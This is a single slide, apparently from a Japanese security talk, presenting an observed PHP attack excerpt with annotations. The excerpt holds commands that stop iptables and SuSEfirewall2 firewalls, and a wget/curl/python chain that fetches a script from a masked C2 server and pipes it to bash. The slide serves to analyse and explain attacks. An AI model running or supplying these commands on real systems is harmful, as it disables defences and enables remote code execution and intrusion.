Slide 28
Slide 28 text
観察事例1.PHP
攻撃コード抜粋
$PS='/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;';
echo(@execute($PS)?'success':'failed');
$PS='(wget -U "Mozilla/WGET" -q -O- http://XXX.XXX.XXX.XXX/Update/test/i.php ||
curl -A "Mozilla/CURL" -fsSL http://XXX.XXX.XXX.XXX/Update/test/i.php ||
python -c "from urllib2 import urlopen,Request;
print(urlopen(Request(\'http://XXX.XXX.XXX.XXX/Update/test/i.php\',
None,{\'User-Agent\':\'Mozilla/Python2\'})).read());"
) | /bin/bash';
die(@execute($PS)?'success':'failed');
①Firewallの停止
②C2サーバからシェルスクリプト取得して実行
(wget、curlまたはpythonのいずれかを使用)
①
②